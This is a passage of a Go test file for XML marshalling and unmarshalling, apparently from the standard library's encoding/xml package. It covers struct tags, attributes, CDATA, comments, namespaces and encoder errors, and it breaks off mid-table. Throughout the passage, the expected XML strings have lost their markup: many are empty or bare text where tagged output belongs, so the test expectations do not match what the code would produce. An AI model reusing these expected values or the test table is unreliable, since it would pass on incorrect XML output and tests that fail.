{ Value: &Data{}, ExpectXML: ``, UnmarshalOnly: true, }, { Value: &Data{Bytes: []byte{}, Custom: MyBytes{}, Attr: []byte{}}, ExpectXML: ``, UnmarshalOnly: true, }, // Check that []byte works, including named []byte types. { Value: &Data{Bytes: []byte("ab"), Custom: MyBytes("cd"), Attr: []byte{'v'}}, ExpectXML: `abcd`, }, // Test innerxml { Value: &SecretAgent{ Handle: "007", Identity: "James Bond", Obfuscate: "", }, ExpectXML: `James Bond`, MarshalOnly: true, }, { Value: &SecretAgent{ Handle: "007", Identity: "James Bond", Obfuscate: "James Bond", }, ExpectXML: `James Bond`, UnmarshalOnly: true, }, // Test structs {Value: &Port{Type: "ssl", Number: "443"}, ExpectXML: `443`}, {Value: &Port{Number: "443"}, ExpectXML: `443`}, {Value: &Port{Type: ""}, ExpectXML: ``}, {Value: &Port{Number: "443", Comment: "https"}, ExpectXML: `443`}, {Value: &Port{Number: "443", Comment: "add space-"}, ExpectXML: `443`, MarshalOnly: true}, {Value: &Domain{Name: []byte("google.com&friends")}, ExpectXML: `google.com&friends`}, {Value: &Domain{Name: []byte("google.com"), Comment: []byte(" &friends ")}, ExpectXML: `google.com`}, {Value: &Book{Title: "Pride & Prejudice"}, ExpectXML: `Pride & Prejudice`}, {Value: &Event{Year: -3114}, ExpectXML: `-3114`}, {Value: &Movie{Length: 13440}, ExpectXML: `13440`}, {Value: &Pi{Approximation: 3.14159265}, ExpectXML: `3.1415927`}, {Value: &Universe{Visible: 9.3e13}, ExpectXML: `9.3e+13`}, {Value: &Particle{HasMass: true}, ExpectXML: `true`}, {Value: &Departure{When: ParseTime("2013-01-09T00:15:00-09:00")}, ExpectXML: `2013-01-09T00:15:00-09:00`}, {Value: atomValue, ExpectXML: atomXML}, {Value: &Generic[int]{1}, ExpectXML: `1`}, { Value: &Ship{ Name: "Heart of Gold", Pilot: "Computer", Age: 1, Drive: ImprobabilityDrive, Passenger: []*Passenger{ { Name: []string{"Zaphod", "Beeblebrox"}, Weight: 7.25, }, { Name: []string{"Trisha", "McMillen"}, Weight: 5.5, }, { Name: []string{"Ford", "Prefect"}, Weight: 7, }, { Name: []string{"Arthur", "Dent"}, Weight: 
6.75, }, }, }, ExpectXML: `` + `` + strconv.Itoa(int(ImprobabilityDrive)) + `` + `1` + `` + `Zaphod` + `Beeblebrox` + `7.25` + `` + `` + `Trisha` + `McMillen` + `5.5` + `` + `` + `Ford` + `Prefect` + `7` + `` + `` + `Arthur` + `Dent` + `6.75` + `` + ``, }, // Test a>b { Value: &NestedItems{Items: nil, Item1: nil}, ExpectXML: `` + `` + `` + ``, }, { Value: &NestedItems{Items: []string{}, Item1: []string{}}, ExpectXML: `` + `` + `` + ``, MarshalOnly: true, }, { Value: &NestedItems{Items: nil, Item1: []string{"A"}}, ExpectXML: `` + `` + `A` + `` + ``, }, { Value: &NestedItems{Items: []string{"A", "B"}, Item1: nil}, ExpectXML: `` + `` + `A` + `B` + `` + ``, }, { Value: &NestedItems{Items: []string{"A", "B"}, Item1: []string{"C"}}, ExpectXML: `` + `` + `A` + `B` + `C` + `` + ``, }, { Value: &NestedOrder{Field1: "C", Field2: "B", Field3: "A"}, ExpectXML: `` + `` + `C` + `B` + `A` + `` + ``, }, { Value: &NilTest{A: "A", B: nil, C: "C"}, ExpectXML: `` + `` + `A` + `C` + `` + ``, MarshalOnly: true, // Uses interface{} }, { Value: &MixedNested{A: "A", B: "B", C: "C", D: "D"}, ExpectXML: `` + `A` + `B` + `` + `C` + `D` + `` + ``, }, { Value: &Service{Port: &Port{Number: "80"}}, ExpectXML: `80`, }, { Value: &Service{}, ExpectXML: ``, }, { Value: &Service{Port: &Port{Number: "80"}, Extra1: "A", Extra2: "B"}, ExpectXML: `` + `80` + `A` + `B` + ``, MarshalOnly: true, }, { Value: &Service{Port: &Port{Number: "80"}, Extra2: "example"}, ExpectXML: `` + `80` + `example` + ``, MarshalOnly: true, }, { Value: &struct { XMLName struct{} `xml:"space top"` A string `xml:"x>a"` B string `xml:"x>b"` C string `xml:"space x>c"` C1 string `xml:"space1 x>c"` D1 string `xml:"space1 x>d"` }{ A: "a", B: "b", C: "c", C1: "c1", D1: "d1", }, ExpectXML: `` + `abc` + `c1` + `d1` + `` + ``, }, { Value: &struct { XMLName Name A string `xml:"x>a"` B string `xml:"x>b"` C string `xml:"space x>c"` C1 string `xml:"space1 x>c"` D1 string `xml:"space1 x>d"` }{ XMLName: Name{ Space: "space0", Local: "top", }, A: 
"a", B: "b", C: "c", C1: "c1", D1: "d1", }, ExpectXML: `` + `ab` + `c` + `c1` + `d1` + `` + ``, }, { Value: &struct { XMLName struct{} `xml:"top"` B string `xml:"space x>b"` B1 string `xml:"space1 x>b"` }{ B: "b", B1: "b1", }, ExpectXML: `` + `b` + `b1` + ``, }, // Test struct embedding { Value: &EmbedA{ EmbedC: EmbedC{ FieldA1: "", // Shadowed by A.A FieldA2: "", // Shadowed by A.A FieldB: "A.C.B", FieldC: "A.C.C", }, EmbedB: EmbedB{ FieldB: "A.B.B", EmbedC: &EmbedC{ FieldA1: "A.B.C.A1", FieldA2: "A.B.C.A2", FieldB: "", // Shadowed by A.B.B FieldC: "A.B.C.C", }, }, FieldA: "A.A", embedD: embedD{ FieldE: "A.D.E", }, }, ExpectXML: `` + `A.C.B` + `A.C.C` + `` + `A.B.B` + `` + `A.B.C.A1` + `A.B.C.A2` + `` + `A.B.C.C` + `` + `A.A` + `A.D.E` + ``, }, // Anonymous struct pointer field which is nil { Value: &EmbedB{}, ExpectXML: ``, }, // Other kinds of nil anonymous fields { Value: &PointerAnonFields{}, ExpectXML: ``, }, // Test that name casing matters { Value: &NameCasing{Xy: "mixed", XY: "upper", XyA: "mixedA", XYA: "upperA"}, ExpectXML: `mixedupper`, }, // Test the order in which the XML element name is chosen { Value: &NamePrecedence{ FromTag: XMLNameWithoutTag{Value: "A"}, FromNameVal: XMLNameWithoutTag{XMLName: Name{Local: "InXMLName"}, Value: "B"}, FromNameTag: XMLNameWithTag{Value: "C"}, InFieldName: "D", }, ExpectXML: `` + `A` + `B` + `C` + `D` + ``, MarshalOnly: true, }, { Value: &NamePrecedence{ XMLName: Name{Local: "Parent"}, FromTag: XMLNameWithoutTag{XMLName: Name{Local: "InTag"}, Value: "A"}, FromNameVal: XMLNameWithoutTag{XMLName: Name{Local: "FromNameVal"}, Value: "B"}, FromNameTag: XMLNameWithTag{XMLName: Name{Local: "InXMLNameTag"}, Value: "C"}, InFieldName: "D", }, ExpectXML: `` + `A` + `B` + `C` + `D` + ``, UnmarshalOnly: true, }, // xml.Name works in a plain field as well. 
{ Value: &NameInField{Name{Space: "ns", Local: "foo"}}, ExpectXML: ``, }, { Value: &NameInField{Name{Space: "ns", Local: "foo"}}, ExpectXML: ``, UnmarshalOnly: true, }, // Marshaling zero xml.Name uses the tag or field name. { Value: &NameInField{}, ExpectXML: ``, MarshalOnly: true, }, // Test attributes { Value: &AttrTest{ Int: 8, Named: 9, Float: 23.5, Uint8: 255, Bool: true, Str: "str", Bytes: []byte("byt"), }, ExpectXML: ``, }, { Value: &AttrTest{Bytes: []byte{}}, ExpectXML: ``, }, { Value: &AttrsTest{ Attrs: []Attr{ {Name: Name{Local: "Answer"}, Value: "42"}, {Name: Name{Local: "Int"}, Value: "8"}, {Name: Name{Local: "int"}, Value: "9"}, {Name: Name{Local: "Float"}, Value: "23.5"}, {Name: Name{Local: "Uint8"}, Value: "255"}, {Name: Name{Local: "Bool"}, Value: "true"}, {Name: Name{Local: "Str"}, Value: "str"}, {Name: Name{Local: "Bytes"}, Value: "byt"}, }, }, ExpectXML: ``, MarshalOnly: true, }, { Value: &AttrsTest{ Attrs: []Attr{ {Name: Name{Local: "Answer"}, Value: "42"}, }, Int: 8, Named: 9, Float: 23.5, Uint8: 255, Bool: true, Str: "str", Bytes: []byte("byt"), }, ExpectXML: ``, }, { Value: &AttrsTest{ Attrs: []Attr{ {Name: Name{Local: "Int"}, Value: "0"}, {Name: Name{Local: "int"}, Value: "0"}, {Name: Name{Local: "Float"}, Value: "0"}, {Name: Name{Local: "Uint8"}, Value: "0"}, {Name: Name{Local: "Bool"}, Value: "false"}, {Name: Name{Local: "Str"}}, {Name: Name{Local: "Bytes"}}, }, Bytes: []byte{}, }, ExpectXML: ``, MarshalOnly: true, }, { Value: &OmitAttrTest{ Int: 8, Named: 9, Float: 23.5, Uint8: 255, Bool: true, Str: "str", Bytes: []byte("byt"), PStr: &empty, }, ExpectXML: ``, }, { Value: &OmitAttrTest{}, ExpectXML: ``, }, // pointer fields { Value: &PointerFieldsTest{Name: &nameAttr, Age: &ageAttr, Contents: &contentsAttr}, ExpectXML: `lorem ipsum`, MarshalOnly: true, }, // empty chardata pointer field { Value: &ChardataEmptyTest{}, ExpectXML: ``, MarshalOnly: true, }, // omitempty on fields { Value: &OmitFieldTest{ Int: 8, Named: 9, Float: 23.5, Uint8: 
255, Bool: true, Str: "str", Bytes: []byte("byt"), PStr: &empty, Ptr: &PresenceTest{}, }, ExpectXML: `` + `8` + `9` + `23.5` + `255` + `true` + `str` + `byt` + `` + `` + ``, }, { Value: &OmitFieldTest{}, ExpectXML: ``, }, // Test ",any" { ExpectXML: `knownunknown`, Value: &AnyTest{ Nested: "known", AnyField: AnyHolder{ XMLName: Name{Local: "other"}, XML: "unknown", }, }, }, { Value: &AnyTest{Nested: "known", AnyField: AnyHolder{ XML: "", XMLName: Name{Local: "AnyField"}, }, }, ExpectXML: `known`, }, { ExpectXML: `b`, Value: &AnyOmitTest{ Nested: "b", }, }, { ExpectXML: `bei`, Value: &AnySliceTest{ Nested: "b", AnyField: []AnyHolder{ { XMLName: Name{Local: "c"}, XML: "e", }, { XMLName: Name{Space: "f", Local: "g"}, XML: "i", }, }, }, }, { ExpectXML: `b`, Value: &AnySliceTest{ Nested: "b", }, }, // Test recursive types. { Value: &RecurseA{ A: "a1", B: &RecurseB{ A: &RecurseA{"a2", nil}, B: "b1", }, }, ExpectXML: `a1a2b1`, }, // Test ignoring fields via "-" tag { ExpectXML: ``, Value: &IgnoreTest{}, }, { ExpectXML: ``, Value: &IgnoreTest{PublicSecret: "can't tell"}, MarshalOnly: true, }, { ExpectXML: `ignore me`, Value: &IgnoreTest{}, UnmarshalOnly: true, }, // Test escaping. { ExpectXML: `dquote: "; squote: '; ampersand: &; less: <; greater: >;`, Value: &AnyTest{ Nested: `dquote: "; squote: '; ampersand: &; less: <; greater: >;`, AnyField: AnyHolder{XMLName: Name{Local: "empty"}}, }, }, { ExpectXML: `newline: ; cr: ; tab: ;`, Value: &AnyTest{ Nested: "newline: \n; cr: \r; tab: \t;", AnyField: AnyHolder{XMLName: Name{Local: "AnyField"}}, }, }, { ExpectXML: "1\r2\r\n3\n\r4\n5", Value: &AnyTest{ Nested: "1\n2\n3\n\n4\n5", }, UnmarshalOnly: true, }, { ExpectXML: `42`, Value: &EmbedInt{ MyInt: 42, }, }, // Test outputting CDATA-wrapped text. 
{ ExpectXML: ``, Value: &CDataTest{}, }, { ExpectXML: ``, Value: &CDataTest{ Chardata: "http://example.com/tests/1?foo=1&bar=baz", }, }, { ExpectXML: `!]]>`, Value: &CDataTest{ Chardata: "Literal !", }, }, { ExpectXML: ` Literal!]]>`, Value: &CDataTest{ Chardata: " Literal!", }, }, { ExpectXML: ` Literal! Literal!]]>`, Value: &CDataTest{ Chardata: " Literal! Literal!", }, }, { ExpectXML: `]]]]>]]>`, Value: &CDataTest{ Chardata: "]]>", }, }, // Test omitempty with parent chain; see golang.org/issue/4168. { ExpectXML: ``, Value: &Strings{}, }, // Custom marshalers. { ExpectXML: `hello world`, Value: &MyMarshalerTest{}, }, { ExpectXML: ``, Value: &MarshalerStruct{}, }, { ExpectXML: ``, Value: &OuterStruct{IntAttr: 10}, }, { ExpectXML: ``, Value: &OuterNamedStruct{XMLName: Name{Space: "outerns", Local: "test"}, IntAttr: 10}, }, { ExpectXML: ``, Value: &OuterNamedOrderedStruct{XMLName: Name{Space: "outerns", Local: "test"}, IntAttr: 10}, }, { ExpectXML: ``, Value: &OuterOuterStruct{OuterStruct{IntAttr: 10}}, }, { ExpectXML: `test`, Value: &NestedAndChardata{AB: make([]string, 2), Chardata: "test"}, }, { ExpectXML: ``, Value: &NestedAndComment{AB: make([]string, 2), Comment: "test"}, }, { ExpectXML: ``, Value: &NestedAndCData{AB: make([]string, 2), CDATA: "test"}, }, // Test pointer indirection in various kinds of fields. 
// https://golang.org/issue/19063 { ExpectXML: ``, Value: &IndirComment{Comment: stringptr("hi")}, MarshalOnly: true, }, { ExpectXML: ``, Value: &IndirComment{Comment: stringptr("")}, MarshalOnly: true, }, { ExpectXML: ``, Value: &IndirComment{Comment: nil}, MarshalError: "xml: bad type for comment field of xml.IndirComment", }, { ExpectXML: ``, Value: &IndirComment{Comment: nil}, UnmarshalOnly: true, }, { ExpectXML: ``, Value: &IfaceComment{Comment: "hi"}, MarshalOnly: true, }, { ExpectXML: ``, Value: &IfaceComment{Comment: nil}, UnmarshalOnly: true, }, { ExpectXML: ``, Value: &IfaceComment{Comment: nil}, MarshalError: "xml: bad type for comment field of xml.IfaceComment", }, { ExpectXML: ``, Value: &IfaceComment{Comment: nil}, UnmarshalOnly: true, }, { ExpectXML: ``, Value: &DirectComment{Comment: string("hi")}, }, { ExpectXML: ``, Value: &DirectComment{Comment: string("")}, }, { ExpectXML: `hi`, Value: &IndirChardata{Chardata: stringptr("hi")}, }, { ExpectXML: ``, Value: &IndirChardata{Chardata: stringptr("hi")}, UnmarshalOnly: true, // marshals without CDATA }, { ExpectXML: ``, Value: &IndirChardata{Chardata: stringptr("")}, }, { ExpectXML: ``, Value: &IndirChardata{Chardata: nil}, MarshalOnly: true, // unmarshal leaves Chardata=stringptr("") }, { ExpectXML: `hi`, Value: &IfaceChardata{Chardata: string("hi")}, UnmarshalError: "cannot unmarshal into interface {}", }, { ExpectXML: ``, Value: &IfaceChardata{Chardata: string("hi")}, UnmarshalOnly: true, // marshals without CDATA UnmarshalError: "cannot unmarshal into interface {}", }, { ExpectXML: ``, Value: &IfaceChardata{Chardata: string("")}, UnmarshalError: "cannot unmarshal into interface {}", }, { ExpectXML: ``, Value: &IfaceChardata{Chardata: nil}, UnmarshalError: "cannot unmarshal into interface {}", }, { ExpectXML: `hi`, Value: &DirectChardata{Chardata: string("hi")}, }, { ExpectXML: ``, Value: &DirectChardata{Chardata: string("hi")}, UnmarshalOnly: true, // marshals without CDATA }, { ExpectXML: ``, 
Value: &DirectChardata{Chardata: string("")}, }, { ExpectXML: ``, Value: &IndirCDATA{CDATA: stringptr("hi")}, }, { ExpectXML: `hi`, Value: &IndirCDATA{CDATA: stringptr("hi")}, UnmarshalOnly: true, // marshals with CDATA }, { ExpectXML: ``, Value: &IndirCDATA{CDATA: stringptr("")}, }, { ExpectXML: ``, Value: &IndirCDATA{CDATA: nil}, MarshalOnly: true, // unmarshal leaves CDATA=stringptr("") }, { ExpectXML: ``, Value: &IfaceCDATA{CDATA: string("hi")}, UnmarshalError: "cannot unmarshal into interface {}", }, { ExpectXML: `hi`, Value: &IfaceCDATA{CDATA: string("hi")}, UnmarshalOnly: true, // marshals with CDATA UnmarshalError: "cannot unmarshal into interface {}", }, { ExpectXML: ``, Value: &IfaceCDATA{CDATA: string("")}, UnmarshalError: "cannot unmarshal into interface {}", }, { ExpectXML: ``, Value: &IfaceCDATA{CDATA: nil}, UnmarshalError: "cannot unmarshal into interface {}", }, { ExpectXML: ``, Value: &DirectCDATA{CDATA: string("hi")}, }, { ExpectXML: `hi`, Value: &DirectCDATA{CDATA: string("hi")}, UnmarshalOnly: true, // marshals with CDATA }, { ExpectXML: ``, Value: &DirectCDATA{CDATA: string("")}, }, { ExpectXML: ``, Value: &IndirInnerXML{InnerXML: stringptr("")}, MarshalOnly: true, }, { ExpectXML: ``, Value: &IndirInnerXML{InnerXML: stringptr("")}, MarshalOnly: true, }, { ExpectXML: ``, Value: &IndirInnerXML{InnerXML: nil}, }, { ExpectXML: ``, Value: &IndirInnerXML{InnerXML: nil}, UnmarshalOnly: true, }, { ExpectXML: ``, Value: &IfaceInnerXML{InnerXML: ""}, MarshalOnly: true, }, { ExpectXML: ``, Value: &IfaceInnerXML{InnerXML: nil}, UnmarshalOnly: true, }, { ExpectXML: ``, Value: &IfaceInnerXML{InnerXML: nil}, }, { ExpectXML: ``, Value: &IfaceInnerXML{InnerXML: nil}, UnmarshalOnly: true, }, { ExpectXML: ``, Value: &DirectInnerXML{InnerXML: string("")}, MarshalOnly: true, }, { ExpectXML: ``, Value: &DirectInnerXML{InnerXML: string("")}, UnmarshalOnly: true, }, { ExpectXML: ``, Value: &DirectInnerXML{InnerXML: string("")}, MarshalOnly: true, }, { ExpectXML: ``, 
Value: &DirectInnerXML{InnerXML: string("")}, UnmarshalOnly: true, }, { ExpectXML: `hi`, Value: &IndirElement{Element: stringptr("hi")}, }, { ExpectXML: ``, Value: &IndirElement{Element: stringptr("")}, }, { ExpectXML: ``, Value: &IndirElement{Element: nil}, }, { ExpectXML: `hi`, Value: &IfaceElement{Element: "hi"}, MarshalOnly: true, }, { ExpectXML: `hi`, Value: &IfaceElement{Element: nil}, UnmarshalOnly: true, }, { ExpectXML: ``, Value: &IfaceElement{Element: nil}, }, { ExpectXML: ``, Value: &IfaceElement{Element: nil}, UnmarshalOnly: true, }, { ExpectXML: `hi`, Value: &DirectElement{Element: string("hi")}, }, { ExpectXML: ``, Value: &DirectElement{Element: string("")}, }, { ExpectXML: `hi`, Value: &IndirOmitEmpty{OmitEmpty: stringptr("hi")}, }, { // Note: Changed in Go 1.8 to include element (because x.OmitEmpty != nil). ExpectXML: ``, Value: &IndirOmitEmpty{OmitEmpty: stringptr("")}, MarshalOnly: true, }, { ExpectXML: ``, Value: &IndirOmitEmpty{OmitEmpty: stringptr("")}, UnmarshalOnly: true, }, { ExpectXML: ``, Value: &IndirOmitEmpty{OmitEmpty: nil}, }, { ExpectXML: `hi`, Value: &IfaceOmitEmpty{OmitEmpty: "hi"}, MarshalOnly: true, }, { ExpectXML: `hi`, Value: &IfaceOmitEmpty{OmitEmpty: nil}, UnmarshalOnly: true, }, { ExpectXML: ``, Value: &IfaceOmitEmpty{OmitEmpty: nil}, }, { ExpectXML: ``, Value: &IfaceOmitEmpty{OmitEmpty: nil}, UnmarshalOnly: true, }, { ExpectXML: `hi`, Value: &DirectOmitEmpty{OmitEmpty: string("hi")}, }, { ExpectXML: ``, Value: &DirectOmitEmpty{OmitEmpty: string("")}, }, { ExpectXML: `hi`, Value: &IndirAny{Any: stringptr("hi")}, }, { ExpectXML: ``, Value: &IndirAny{Any: stringptr("")}, }, { ExpectXML: ``, Value: &IndirAny{Any: nil}, }, { ExpectXML: `hi`, Value: &IfaceAny{Any: "hi"}, MarshalOnly: true, }, { ExpectXML: `hi`, Value: &IfaceAny{Any: nil}, UnmarshalOnly: true, }, { ExpectXML: ``, Value: &IfaceAny{Any: nil}, }, { ExpectXML: ``, Value: &IfaceAny{Any: nil}, UnmarshalOnly: true, }, { ExpectXML: `hi`, Value: &DirectAny{Any: 
string("hi")}, }, { ExpectXML: ``, Value: &DirectAny{Any: string("")}, }, { ExpectXML: `hi`, Value: &IndirAny{Any: stringptr("hi")}, UnmarshalOnly: true, }, { ExpectXML: ``, Value: &IndirAny{Any: stringptr("")}, UnmarshalOnly: true, }, { ExpectXML: ``, Value: &IndirAny{Any: nil}, UnmarshalOnly: true, }, { ExpectXML: `hi`, Value: &IfaceAny{Any: nil}, UnmarshalOnly: true, }, { ExpectXML: ``, Value: &IfaceAny{Any: nil}, UnmarshalOnly: true, }, { ExpectXML: ``, Value: &IfaceAny{Any: nil}, UnmarshalOnly: true, }, { ExpectXML: `hi`, Value: &DirectAny{Any: string("hi")}, UnmarshalOnly: true, }, { ExpectXML: ``, Value: &DirectAny{Any: string("")}, UnmarshalOnly: true, }, } func TestMarshal(t *testing.T) { for idx, test := range marshalTests { if test.UnmarshalOnly { continue } t.Run(fmt.Sprintf("%d", idx), func(t *testing.T) { data, err := Marshal(test.Value) if err != nil { if test.MarshalError == "" { t.Errorf("marshal(%#v): %s", test.Value, err) return } if !strings.Contains(err.Error(), test.MarshalError) { t.Errorf("marshal(%#v): %s, want %q", test.Value, err, test.MarshalError) } return } if test.MarshalError != "" { t.Errorf("Marshal succeeded, want error %q", test.MarshalError) return } if got, want := string(data), test.ExpectXML; got != want { if strings.Contains(want, "\n") { t.Errorf("marshal(%#v):\nHAVE:\n%s\nWANT:\n%s", test.Value, got, want) } else { t.Errorf("marshal(%#v):\nhave %#q\nwant %#q", test.Value, got, want) } } }) } } type AttrParent struct { X string `xml:"X>Y,attr"` } type BadAttr struct { Name map[string]string `xml:"name,attr"` } var marshalErrorTests = []struct { Value any Err string Kind reflect.Kind }{ { Value: make(chan bool), Err: "xml: unsupported type: chan bool", Kind: reflect.Chan, }, { Value: map[string]string{ "question": "What do you get when you multiply six by nine?", "answer": "42", }, Err: "xml: unsupported type: map[string]string", Kind: reflect.Map, }, { Value: map[*Ship]bool{nil: false}, Err: "xml: unsupported type: 
map[*xml.Ship]bool", Kind: reflect.Map, }, { Value: &Domain{Comment: []byte("f--bar")}, Err: `xml: comments must not contain "--"`, }, // Reject parent chain with attr, never worked; see golang.org/issue/5033. { Value: &AttrParent{}, Err: `xml: X>Y chain not valid with attr flag`, }, { Value: BadAttr{map[string]string{"X": "Y"}}, Err: `xml: unsupported type: map[string]string`, }, } var marshalIndentTests = []struct { Value any Prefix string Indent string ExpectXML string }{ { Value: &SecretAgent{ Handle: "007", Identity: "James Bond", Obfuscate: "", }, Prefix: "", Indent: "\t", ExpectXML: "\n\tJames Bond\n", }, } func TestMarshalErrors(t *testing.T) { for idx, test := range marshalErrorTests { data, err := Marshal(test.Value) if err == nil { t.Errorf("#%d: marshal(%#v) = [success] %q, want error %v", idx, test.Value, data, test.Err) continue } if err.Error() != test.Err { t.Errorf("#%d: marshal(%#v) = [error] %v, want %v", idx, test.Value, err, test.Err) } if test.Kind != reflect.Invalid { if kind := err.(*UnsupportedTypeError).Type.Kind(); kind != test.Kind { t.Errorf("#%d: marshal(%#v) = [error kind] %s, want %s", idx, test.Value, kind, test.Kind) } } } } // Do invertibility testing on the various structures that we test func TestUnmarshal(t *testing.T) { for i, test := range marshalTests { if test.MarshalOnly { continue } if _, ok := test.Value.(*Plain); ok { continue } if test.ExpectXML == ``+ `b`+ `b1`+ `` { // TODO(rogpeppe): re-enable this test in // https://go-review.googlesource.com/#/c/5910/ continue } vt := reflect.TypeOf(test.Value) dest := reflect.New(vt.Elem()).Interface() err := Unmarshal([]byte(test.ExpectXML), dest) t.Run(fmt.Sprintf("%d", i), func(t *testing.T) { switch fix := dest.(type) { case *Feed: fix.Author.InnerXML = "" for i := range fix.Entry { fix.Entry[i].Author.InnerXML = "" } } if err != nil { if test.UnmarshalError == "" { t.Errorf("unmarshal(%#v): %s", test.ExpectXML, err) return } if !strings.Contains(err.Error(), 
test.UnmarshalError) { t.Errorf("unmarshal(%#v): %s, want %q", test.ExpectXML, err, test.UnmarshalError) } return } if got, want := dest, test.Value; !reflect.DeepEqual(got, want) { t.Errorf("unmarshal(%q):\nhave %#v\nwant %#v", test.ExpectXML, got, want) } }) } } func TestMarshalIndent(t *testing.T) { for i, test := range marshalIndentTests { data, err := MarshalIndent(test.Value, test.Prefix, test.Indent) if err != nil { t.Errorf("#%d: Error: %s", i, err) continue } if got, want := string(data), test.ExpectXML; got != want { t.Errorf("#%d: MarshalIndent:\nGot:%s\nWant:\n%s", i, got, want) } } } type limitedBytesWriter struct { w io.Writer remain int // until writes fail } func (lw *limitedBytesWriter) Write(p []byte) (n int, err error) { if lw.remain <= 0 { println("error") return 0, errors.New("write limit hit") } if len(p) > lw.remain { p = p[:lw.remain] n, _ = lw.w.Write(p) lw.remain = 0 return n, errors.New("write limit hit") } n, err = lw.w.Write(p) lw.remain -= n return n, err } func TestMarshalWriteErrors(t *testing.T) { var buf bytes.Buffer const writeCap = 1024 w := &limitedBytesWriter{&buf, writeCap} enc := NewEncoder(w) var err error var i int const n = 4000 for i = 1; i <= n; i++ { err = enc.Encode(&Passenger{ Name: []string{"Alice", "Bob"}, Weight: 5, }) if err != nil { break } } if err == nil { t.Error("expected an error") } if i == n { t.Errorf("expected to fail before the end") } if buf.Len() != writeCap { t.Errorf("buf.Len() = %d; want %d", buf.Len(), writeCap) } } func TestMarshalWriteIOErrors(t *testing.T) { enc := NewEncoder(errWriter{}) expectErr := "unwritable" err := enc.Encode(&Passenger{}) if err == nil || err.Error() != expectErr { t.Errorf("EscapeTest = [error] %v, want %v", err, expectErr) } } func TestMarshalFlush(t *testing.T) { var buf strings.Builder enc := NewEncoder(&buf) if err := enc.EncodeToken(CharData{data: []byte("hello world")}); err != nil { t.Fatalf("enc.EncodeToken: %v", err) } if buf.Len() > 0 { 
t.Fatalf("enc.EncodeToken caused actual write: %q", buf.String()) } if err := enc.Flush(); err != nil { t.Fatalf("enc.Flush: %v", err) } if buf.String() != "hello world" { t.Fatalf("after enc.Flush, buf.String() = %q, want %q", buf.String(), "hello world") } } func BenchmarkMarshal(b *testing.B) { b.ReportAllocs() b.RunParallel(func(pb *testing.PB) { for pb.Next() { Marshal(atomValue) } }) } func BenchmarkUnmarshal(b *testing.B) { b.ReportAllocs() xml := []byte(atomXML) b.RunParallel(func(pb *testing.PB) { for pb.Next() { Unmarshal(xml, &Feed{}) } }) } // golang.org/issue/6556 func TestStructPointerMarshal(t *testing.T) { type A struct { XMLName string `xml:"a"` B []any } type C struct { XMLName Name Value string `xml:"value"` } a := new(A) a.B = append(a.B, &C{ XMLName: Name{Local: "c"}, Value: "x", }) b, err := Marshal(a) if err != nil { t.Fatal(err) } if x := string(b); x != "x" { t.Fatal(x) } var v A err = Unmarshal(b, &v) if err != nil { t.Fatal(err) } } var encodeTokenTests = []struct { desc string toks []Token want string err string }{{ desc: "start element with name space", toks: []Token{ StartElement{Name{"space", "local"}, nil, false, ""}, }, want: ``, }, { desc: "start element with no name", toks: []Token{ StartElement{Name{"space", ""}, nil, false, ""}, }, err: "xml: start tag with no name", }, { desc: "end element with no name", toks: []Token{ EndElement{Name{"space", ""}, false}, }, err: "xml: end tag with no name", }, { desc: "empty element", toks: []Token{ StartElement{Name{"", "foo"}, nil, true, ""}, EndElement{Name{"", "foo"}, true}, }, want: ``, }, { desc: "empty element with extra space", toks: []Token{ StartElement{Name{"", "foo"}, nil, true, " "}, EndElement{Name{"", "foo"}, true}, }, want: ``, }, { desc: "char data", toks: []Token{ CharData{data: []byte("foo")}, }, want: `foo`, }, { desc: "char data with tab and newline characters", toks: []Token{ CharData{data: []byte(" \t\n")}, }, want: " \t\n", }, { desc: "comment", toks: []Token{ 
Comment("foo"), }, want: ``, }, { desc: "comment with invalid content", toks: []Token{ Comment("foo-->"), }, err: "xml: EncodeToken of Comment containing --> marker", }, { desc: "proc instruction", toks: []Token{ ProcInst{"Target", []byte("Instruction")}, }, want: ``, }, { desc: "proc instruction with empty target", toks: []Token{ ProcInst{"", []byte("Instruction")}, }, err: "xml: EncodeToken of ProcInst with invalid Target", }, { desc: "proc instruction with bad content", toks: []Token{ ProcInst{"", []byte("Instruction?>")}, }, err: "xml: EncodeToken of ProcInst with invalid Target", }, { desc: "directive", toks: []Token{ Directive("foo"), }, want: ``, }, { desc: "more complex directive", toks: []Token{ Directive("DOCTYPE doc [ '> ]"), }, want: `'> ]>`, }, { desc: "directive instruction with bad name", toks: []Token{ Directive("foo>"), }, err: "xml: EncodeToken of Directive containing wrong < or > markers", }, { desc: "end tag without start tag", toks: []Token{ EndElement{Name{"foo", "bar"}, false}, }, err: "xml: end tag without start tag", }, { desc: "mismatching end tag local name", toks: []Token{ StartElement{Name{"", "foo"}, nil, false, ""}, EndElement{Name{"", "bar"}, false}, }, err: "xml: end tag does not match start tag ", want: ``, }, { desc: "mismatching end tag namespace", toks: []Token{ StartElement{Name{"space", "foo"}, nil, false, ""}, EndElement{Name{"another", "foo"}, false}, }, err: "xml: end tag in namespace another does not match start tag in namespace space", want: ``, }, { desc: "start element with explicit namespace", toks: []Token{ StartElement{Name{"space", "local"}, []Attr{ {Name{"xmlns", "x"}, "space", ""}, {Name{"space", "foo"}, "value", ""}, }, false, ""}, }, want: ``, }, { desc: "start element with explicit namespace and colliding prefix", toks: []Token{ StartElement{Name{"space", "local"}, []Attr{ {Name{"xmlns", "x"}, "space", ""}, {Name{"space", "foo"}, "value", ""}, {Name{"x", "bar"}, "other", ""}, }, false, ""}, }, want: ``, }, { 
desc: "start element using previously defined namespace", toks: []Token{ StartElement{Name{"", "local"}, []Attr{ {Name{"xmlns", "x"}, "space", ""}, }, false, ""}, StartElement{Name{"space", "foo"}, []Attr{ {Name{"space", "x"}, "y", ""}, }, false, ""}, }, want: ``, }, { desc: "nested name space with same prefix", toks: []Token{ StartElement{Name{"", "foo"}, []Attr{ {Name{"xmlns", "x"}, "space1", ""}, }, false, ""}, StartElement{Name{"", "foo"}, []Attr{ {Name{"xmlns", "x"}, "space2", ""}, }, false, ""}, StartElement{Name{"", "foo"}, []Attr{ {Name{"space1", "a"}, "space1 value", ""}, {Name{"space2", "b"}, "space2 value", ""}, }, false, ""}, EndElement{Name{"", "foo"}, false}, EndElement{Name{"", "foo"}, false}, StartElement{Name{"", "foo"}, []Attr{ {Name{"space1", "a"}, "space1 value", ""}, {Name{"space2", "b"}, "space2 value", ""}, }, false, ""}, }, want: ``, }, { desc: "start element defining several prefixes for the same name space", toks: []Token{ StartElement{Name{"space", "foo"}, []Attr{ {Name{"xmlns", "a"}, "space", ""}, {Name{"xmlns", "b"}, "space", ""}, {Name{"space", "x"}, "value", 